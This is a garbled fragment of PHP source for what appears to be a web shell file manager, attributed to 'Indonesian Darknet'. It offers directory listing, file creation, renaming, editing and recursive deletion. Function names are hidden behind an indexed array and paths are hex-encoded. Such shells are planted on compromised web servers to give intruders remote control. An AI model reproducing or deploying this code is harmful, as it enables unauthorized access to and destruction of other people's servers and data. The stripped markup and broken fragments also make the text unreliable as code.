swal({title: \"{$status}\", text: \"{$msg}\", icon: \"{$status}\"}).then((btnClick) => {if(btnClick){document.location.href=\"?p=".hex($p).$loc."\"}})";
}
function deldir($d) {
global $fc;
if (trim(pathinfo($d, PATHINFO_BASENAME), '.') === '') return;
if ($fc[6]($d)) {
array_map("deldir", glob($d . DIRECTORY_SEPARATOR . '{,.}*', GLOB_BRACE | GLOB_NOSORT));
rmdir($d);
} else {
unlink($d);
}
}
?>
= self ?>Path:
$v) {
if ($k == 0 && $v == "") {
echo "
~/"; continue;
}
if ($v == "") continue;
echo "
{$v}/";
}
?>
Name | Size | Permission | Action |
{$d} | N/A | ".perms("$p/$d")." | | ";
}
foreach ($scD as $f) {
if (!$fc[7]("$p/$f")) continue;
$sz = $fc[10]("$p/$f")/1024;
$sz = round($sz, 3);
$sz = ($sz > 1024) ? round($sz/1024, 2)."MB" : $sz."KB";
echo " {$f} | {$sz} | ".perms("$p/$f")." | |
";
}
?>
New folder
New file
Rename = (($_GET["t"] == "d") ? "folder" : "file") ?>
Edit file
File name : = nhx($_GET["n"]) ?>
View file
File name : = nhx($_GET["n"]) ?>
Copyright © 2021 - Powered By Indonesian Darknet